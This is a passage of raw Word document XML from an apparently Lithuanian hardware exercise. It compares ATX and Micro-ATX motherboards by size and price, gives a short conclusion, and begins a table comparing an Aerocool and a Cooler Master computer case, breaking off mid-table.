            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="57B93E57" w14:textId="15A78A86" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ilgis244 mm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DD679EE" w14:textId="19BD7DF9" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Plotis244 mm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3ABEE767" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="71580AE5" w14:textId="12062BC7" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Pagrindinės plokštės formos faktorius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3A7CEB25" w14:textId="51BBCB7E" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ATX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="03A51235" w14:textId="7C1A6DE9" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Micro-ATX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="564132E3" w:rsidRPr="005A5C28" w14:paraId="3540DBBD" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="69F44559" w14:textId="25437C66" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Kaina </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7C807F62" w14:textId="4CE0BB3C" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>298,89 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5AB637C7" w14:textId="05CC8DF7" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>137,60 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36437BEC" w14:textId="3C31B294" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="00B0488D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AF3F33C" w14:textId="415667F8" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Išvados. </w:t>
      </w:r>
      <w:r w:rsidR="005F39ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kirtingų formos faktorių pagrindinės ploktės, t.y. ATX ir Micro-ATX</w:t>
      </w:r>
      <w:r w:rsidR="005F39ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>skiriasi ne tik</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>didži</w:t>
      </w:r>
      <w:r w:rsidR="005F39ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>u,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>bet ir lizdų skaičiumi. Didesnėje ATX formos faktoriaus pagrindinėje plokštėje daugiau lizdų, o tai reikia, kad galima</w:t>
      </w:r>
      <w:r w:rsidR="005F39ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> prijungti</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>daugiau įrenginių.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Micro-ATX formos faktoriaus pliusai yra t</w:t>
      </w:r>
      <w:r w:rsidR="005F39ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ie</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kad ji yra kompaktiška ir gali tilpti į mažesnį</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F39ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">kompiuterio </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>korpusą</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7827FBAE" w14:textId="77777777" w:rsidR="006D4299" w:rsidRPr="005A5C28" w:rsidRDefault="006D4299" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F3E9663" w14:textId="77777777" w:rsidR="00750DF8" w:rsidRPr="005A5C28" w:rsidRDefault="00750DF8" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>5 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUKURTI LENTELĘ IR PALYGINTI KELIŲ FORMOS FAKTORIŲ KORPUSUS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D45D0F6" w14:textId="27013FB4" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LAUKIAMI REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="1EA8E69B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="1EA8E69B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782BBA80" w14:textId="35DDE924" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="00B0488D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276"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4"/>
        <w:gridCol w:w="3306"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2B9212A1" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0B5B9B3F" w14:textId="66937F33" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Korpuso modelis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="43F0CE3A" w14:textId="6F353486" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Aerocool Glider ATX Mid-Tower Black</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="13D0827A" w14:textId="0A1ED8E1" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="5B48E98C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Cooler Master Chassis MASTERBOX Q300L</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7478283F" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4707034F" w14:textId="7F46FB3F" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Gamintojas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="047931BB" w14:textId="1ADB7C55" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Aerocool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="052EAB1A" w14:textId="02698D49" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Cooler Master</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7CE9A246" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="43DFCF9D" w14:textId="2424B639" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Medžiaga</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="13F82EAA" w14:textId="2E9764D6" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Anglies plienas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4C203B43" w14:textId="522C6FDB" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Plastikas, Plienas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="01E8AD13" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="344E048D" w14:textId="02F39E7C" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Spalva</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1E262C24" w14:textId="6F10E9E5" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>juoda</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="50F5C37C" w14:textId="1D069635" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>juoda</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="42DD2580" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="089A3D78" w14:textId="2A1DE1B4" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Korpuso formos faktorius </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>(dydis)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="349B3352" w14:textId="18690205" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Mid tower (ATX)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1D7C9FE1" w14:textId="04BB5268" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Mini tower (Micro ATX)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="498EA315" w14:textId="77777777" w:rsidTr="00750DF8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="68EDFDDE" w14:textId="7FC70644" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Išplėtimo galimybės</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="39A31917" w14:textId="1DA02CAE" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.5 x 1 colio skyrių skaičius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2799410D" w14:textId="1CB952D9" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
